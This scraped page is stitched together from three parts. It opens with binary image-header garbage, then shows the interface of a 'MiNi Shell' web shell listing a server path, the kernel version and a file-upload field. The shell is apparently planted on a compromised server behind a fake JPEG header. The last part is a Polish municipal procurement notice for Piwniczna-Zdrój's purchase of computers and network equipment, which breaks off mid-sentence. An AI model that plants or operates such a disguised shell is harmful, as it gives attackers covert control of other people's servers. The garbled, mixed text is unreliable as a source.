JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230316/0013966601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawy i usługi w ramach Programu Operacyjnego Polska Cyfrowa na lata 2014-2020 Osi Priorytetowej V Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia REACT-EU . </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto i Gmina Piwniczna-Zdrój</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491893084</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piwniczna-Zdrój</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-350</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@piwniczna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.piwniczna.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawy i usługi w ramach Programu Operacyjnego Polska Cyfrowa na lata 2014-2020 Osi Priorytetowej V Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia REACT-EU . </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-51436d91-c404-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00139666</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00027424/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawy i usługi w ramach Programu Operacyjnego Polska Cyfrowa na lata 2014-2020 Osi Priorytetowej V Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia REACT-EU</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> 5.1 Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia dotycząca realizacji projektu grantowego „Cyfrowa Gmina” o numerze POPC.05.01.00-00-0001/21-00 dla Gminy Piwniczna-Zdrój. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://piwniczna.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://piwniczna.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">13.1 Komunikacja w postępowaniu o udzielenie zamówienia w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wyko-nawcą, odbywa się przy użyciu środków komunikacji elektronicznej, tj. za pośrednictwem platformy zakupowej dostępnej pod adresem: https://piwniczna.ezamawiajacy.pl w zakładce „ Korespondencja”<br/>13.2. Sposób sporządzenia dokumentów elektronicznych oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przeka-zywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środ-ków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452) oraz Rozporządzeniu Ministra Rozwoju, Pracy i Techno-logii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. z 2020 r. poz. 2415). <br/>13.3 Ogólne zasady korzystania z Platformy<br/>13.3.1 zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdo-menie Miasta i Gminy Piwniczna-Zdrój https://piwniczna.ezamawiajacy.pl, lub https://oneplace.marketplanet.pl.<br/>13.3.2 Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogo-wania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki proce-su rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. <br/>13.3.3. Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Za-mawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci elektronicznej. <br/>Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informację, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu. <br/>13.5.4 .Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Ko-munikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są przy użyciu środków komunikacji elektronicznej za pośrednic-twem Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki „Korespondencja”.<br/>13.6. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 20 MB w, rtf, pdf , doc, docx,</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrek-tywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: <br/>24.1. Administratorem Państwa danych osobowych jest Miasto i Gmina Piwniczna -Zdrój, ul. Rynek 20, 33-350 Piwniczna -Zdrój.<br/>24.2. Miasto i Gmina Piwniczna -Zdrój wyznaczyła Inspektora Ochrony Danych. Pan Andrzej Włodarczyk, adres e-mail: inspektor@odo.info.pl;<br/>24.3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie przedmiotowego zamówienia publicznego <br/>24.4. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępnio-na zostanie dokumentacja postępowania w oparciu o art. 18-19 ustawy. <br/>24.5. Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. <br/>24.6. Obowiązek podania przez Państwa danych osobowych bezpośrednio Pani/Pana dotyczą-cych jest wymogiem ustawowym określonym w przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy. <br/>24.7. W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO. <br/>24.8. Posiadają Państwo: <br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Państwa dotyczących; <br/>− na podstawie art. 16 RODO prawo do sprostowania Państwa danych osobowych ; <br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznacie Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO. <br/>24.9. Nie przysługuje Państwu: <br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RO-DO. <br/>24.10. Informacja o ograniczeniach, o których mowa w art. 19 ust. 2 i 3 ustawy</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">24.10. Informacja o ograniczeniach, o których mowa w art. 19 ust. 2 i 3 ustawy <br/>Zgodnie z art. 19 ust. 4 ustawy Zamawiający informuje o ograniczeniach, o których mowa w art. 19 ust. 2 i 3 ustawy: <br/>− Zgodnie z art. 19 ust. 3 ustawy skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. <br/>− Na mocy art. 19 ust. 3 ustawy wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępo-wania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Zp.271.13.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> I. Część 1 - Dostawy i usługi w ramach Programu Operacyjnego Polska Cyfrowa na lata 2014-2020 Osi Priorytetowej V Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia REACT-EU - zakup i dostawa dwudziestu sztuk komputerów wraz oprogramowaniem. <br/>– zgodnie z Załącznikiem Nr_4.1 Cześć 1 - Opis przedmiotu zamówienia<br/>1.1.	Na planowany zakup, materiałów i urządzeń wyspecyfikowanych należy każdorazowo uzyskać akceptację od Zamawiającego.<br/>1.2.	Wykonawca zobowiązany jest do dokładnego sprawdzenia ilości robót z uwagi na to, że umowa na dostawy będzie umową ryczałtową.<br/>1.3.	W przypadku, wskazania w opisie przedmiotu zamówienia, w załączniku do oferty, w projekcie znaku towarowego, patentu lub pochodzenia, źródła lub szczególnego proce-su, który charakteryzuje produkty lub usługi służy to jedynie celom identyfikacyjnym. Na-zwy stanowią jedynie precyzyjne określenie klasy oraz parametrów technicznych produk-tów wymaganych przez Zamawiającego i mają charakter wyłącznie przykładowy. W myśl art. 99 ust.5 ustawy Prawo zamówień publicznych, Zamawiający dopuszcza moż-liwość składania w tym zakresie ofert jakościowo równoważnych, spełniających równo-ważne parametry określone w opisie. Przez produkt równoważny Zamawiający rozumie produkt, o parametrach takich samych bądź lepszych w stosunku do zaproponowanego produktu czy urządzenia oraz zgodny z dokumentacją opisującą przedmiot zamówienia oraz produkt, odpowiadający zastosowanym rozwiązaniom technologicznym. Zaofero-wane urządzenia i materiały równoważne, muszą posiadać stosowne wymagane przepi-sami prawa atesty lub dopuszczenia do obrotu gospodarczego tak, aby Zamawiający mógł sprawdzić, czy odpowiadają one wymaganiom postawionym w Specyfikacji Wa-runków Zamówienia. W takiej sytuacji Zamawiający wymaga udowodnienia przez Wy-konawcę tego faktu, a w szczególności złożenia stosownych dokumentów, potwierdzają-cych, że te materiały lub urządzenia są równoważne.<br/>1.4.	Wszystkie oferowane materiały muszą być, wolne od wad fizycznych i prawnych, wolne od praw osób trzecich oraz nie mogą być przedmiotem żadnego postępowania i zabez-pieczenia.<br/>1.5.	Za termin realizacji przedmiotu umowy uznaje się datę wskazaną w protokole odbioru końcowego przedmiotu umowy, podpisanego przez Zamawiającego oraz Wykonawcę.<br/>1.6.	Zamówienie realizowane jest w ramach dofinansowania w ramach Programu Opera-cyjnego Polska Cyfrowa na lata 2014-2020 Osi Priorytetowej V Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia REACT-EU działania 5.1 Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia dotycząca realizacji projektu grantowego „Cyfrowa Gmina” zgodnie z Wytycznymi zawartymi w przedmiotowym Pro-gramie, Wykonawcę obowiązują zapisy obowiązujące w przedmiotowym programie.<br/>2. Gwarancja.<br/>2.1.	Szczegółowy opis informacji dotyczących okresu gwarancji opisano w § 5 projektu umo-wy – załącznik nr 3 do SWZ.<br/>2.2.	Wykonawca udziela Zamawiającemu gwarancji na cały przedmiot umowy tj. dostawy stanowiące przedmiot umowy.<br/>2.3.	Termin gwarancji na dostawy stanowi jedno z kryteriów oceny ofert i ustala się na okres zgodny z zaproponowanym przez Wykonawcę w treści złożonej oferty.<br/>2.4.	Wykonawca może zaproponować okres gwarancji zaoferowany w ofercie w zakresie min. 24 miesięcy - max. 36 miesięcy.<br/>3.	kod CPV	<br/>Główny kod CPV: <br/>30200000-1 Urządzenia komputerowe<br/>Dodatkowe kody CPV: <br/>30213000-5 Komputery osobiste<br/>48000000-8 Pakiety oprogramowania i systemy informatyczne </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213000-5 - Komputery osobiste</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria i sposób oceny oferty<br/>- cena,<br/>- okres gwarancji na sprzęt i urządzenia<br/>Kryterium – „Cena”<br/>Kryterium – „Cena” będzie oceniane na podstawie ceny brutto przedmiotu zamówienia zawartej w ofercie, a ilość punktów obliczana będzie według poniższego wzoru:<br/>C = WP x Cnaj/cof <br/>gdzie:<br/>C – liczba punktów przyznanych ocenianej ofercie w kryterium „Cena”<br/>WP – waga dla kryterium „Cena” 60 pkt<br/>Cnaj – najniższa cena brutto zaoferowana w przetargu nie podlegająca odrzuceniu- dzielna<br/>Cof – cena brutto zawarta w ocenianej ofercie – dzielnik<br/>Kryterium – okres gwarancji na sprzęt i urządzenia<br/>1) okres gwarancji na sprzęt i urządzenia liczony jest w miesiącach;<br/>2) minimalny okres gwarancji na sprzęt i urządzenia wynosi 24 miesięcy - w przypadku zaoferowania przez Wykonawcę okresu gwarancji na sprzęt i urządzenia krótszego niż 24 miesięcy Zamawiający ofertę odrzuci. W przypadku, gdy Wykonawca w ogóle nie wskaże w ofercie oferowanego okresu gwarancji na sprzęt i urządzenia zamawiający przyjmie, że Wykonawca nie oferuje gwarancji na sprzęt i urządzenia i ofertę odrzuci;<br/>3) maksymalny okres rękojmi i gwarancji wynosi 36 miesiące - wskazany w formularzu ofertowym okres gwarancji na sprzęt i urządzenia powyżej 36 miesięcy liczony będzie jako okres gwarancji na sprzęt i urządzenia 36 miesiące;<br/>4) Wykonawcy oferują długość okresu gwarancji na sprzęt i urządzenia w pełnych miesiącach;<br/>5) ocena punktowa oferty nie podlegającej odrzuceniu w tym kryterium zostanie przeprowadzona zgodnie z następującą formułą:<br/>G = ( ((Robliczana-Rmin))/((Rmax-Rmin) ) ) x Wmax<br/>G– wartość punktowa, którą należy wyznaczyć<br/>Wmax – waga kryterium – maksymalna liczba punktów, która może być przyznana w danym kryterium tj. 40 pkt.<br/>G min – wartość najniższa spośród złożonych ofert wykonawców nie podlegających odrzuceniu tj, 24 miesięcy<br/>G max – wartość najwyższa spośród złożonych ofert wykonawców nie podlegających odrzuceniu tj. 36 miesiące<br/>G obliczana – wartość obliczana w danym kryterium – wartość zaoferowana przez Wykonawcę nie podlegającego odrzuceniu<br/>(Robliczalna-Rmin) – dzielna<br/>(Rmax-Rmin) – dzielnik<br/>Sposób oceny ofert<br/>Oferta, która otrzyma największą, łączną ilość punktów uznana zostanie za najkorzystniejszą.<br/>Ocena ogólna poszczególnych ofert dokonywana będzie w oparciu o poniższą formułę:<br/>S = C + G <br/>gdzie:<br/>S – oznacza łączną oceną jako sumę punktów w poszczególnych kryteriach<br/>C – liczba punktów uzyskanych w kryterium - cena <br/>G – liczba punktów uzyskanych w kryterium - okres gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji na sprzęt i urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> II Część 2 - Dostawy i usługi w ramach Programu Operacyjnego Polska Cyfrowa na lata 2014-2020 Osi Priorytetowej V Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia REACT-EU - zakup i dostawa czterech sztuk urządzeń sieciowych i osprzętu sieciowego pozwalającego na przyłączenie do szerokopasmowego Internetu<br/> – zgodnie z Załącznikiem_Nr_4.2 Opis Przedmiotu zamówienia Część 2<br/>1.1. Na planowany zakup, materiałów i urządzeń wyspecyfikowanych należy każdorazowo uzyskać akceptację od Zamawiającego	.<br/>1.2. Wykonawca zobowiązany jest do dokładnego sprawdzenia ilości robót z uwagi na to, że umowa na dostawy będzie umową ryczałtową. <br/>1.3. W przypadku, wskazania w opisie przedmiotu zamówienia, w załączniku do oferty, w projekcie znaku towarowego, patentu lub pochodzenia, źródła lub szczególnego procesu, któ-ry charakteryzuje produkty lub usługi służy to jedynie celom identyfikacyjnym. Nazwy stano-wią jedynie precyzyjne określenie klasy oraz parametrów technicznych produktów wymaga-nych przez Zamawiającego i mają charakter wyłącznie przykładowy. W myśl art. 99 ust.5 ustawy Prawo zamówień publicznych, Zamawiający dopuszcza możliwość składania w tym zakresie ofert jakościowo równoważnych, spełniających równoważne parametry określone w opisie. Przez produkt równoważny Zamawiający rozumie produkt, o parametrach takich sa-mych bądź lepszych w stosunku do zaproponowanego produktu czy urządzenia oraz zgodny z dokumentacją opisującą przedmiot zamówienia oraz produkt, odpowiadający zastosowanym rozwiązaniom technologicznym. Zaoferowane urządzenia i materiały równoważne, muszą posiadać stosowne wymagane przepisami prawa atesty lub dopuszczenia do obrotu gospo-darczego tak, aby Zamawiający mógł sprawdzić, czy odpowiadają one wymaganiom posta-wionym w Specyfikacji Warunków Zamówienia. W takiej sytuacji Zamawiający wymaga udowodnienia przez Wykonawcę tego faktu, a w szczególności złożenia stosownych doku-mentów, potwierdzających, że te materiały lub urządzenia są równoważne<br/>1.4 Wszystkie oferowane materiały 